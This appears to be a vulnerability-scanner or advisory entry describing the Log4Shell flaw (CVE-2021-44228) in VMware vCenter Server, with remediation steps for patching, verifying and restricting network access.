VMware vCenter Log4Shell RCE
Description
VMware vCenter Server is affected by the Log4Shell vulnerability (CVE-2021-44228) due to its use of a vulnerable version of the Apache Log4j library. This critical flaw allows remote attackers to execute arbitrary code without authentication by exploiting improper input validation in Log4j's logging mechanism. Attackers can trigger malicious JNDI lookups that result in remote code execution or information disclosure.
Remediation
Apply the security patches provided by VMware immediately by following these steps:
1. Review the VMware Security Advisory VMSA-2021-0028 to identify the appropriate patch for your vCenter version
2. Download the applicable security patch or updated version from the VMware Customer Connect portal
3. Create a backup or snapshot of your vCenter Server before applying updates
4. Apply the patch following VMware's documented upgrade procedures for your deployment type (vCenter Server Appliance or Windows-based)
5. Verify the patch installation by checking the vCenter version number post-update
6. Monitor system logs for any suspicious activity that may have occurred prior to patching
As a temporary mitigation if immediate patching is not possible, consider implementing network-level restrictions to limit access to vCenter Server to trusted IP addresses only.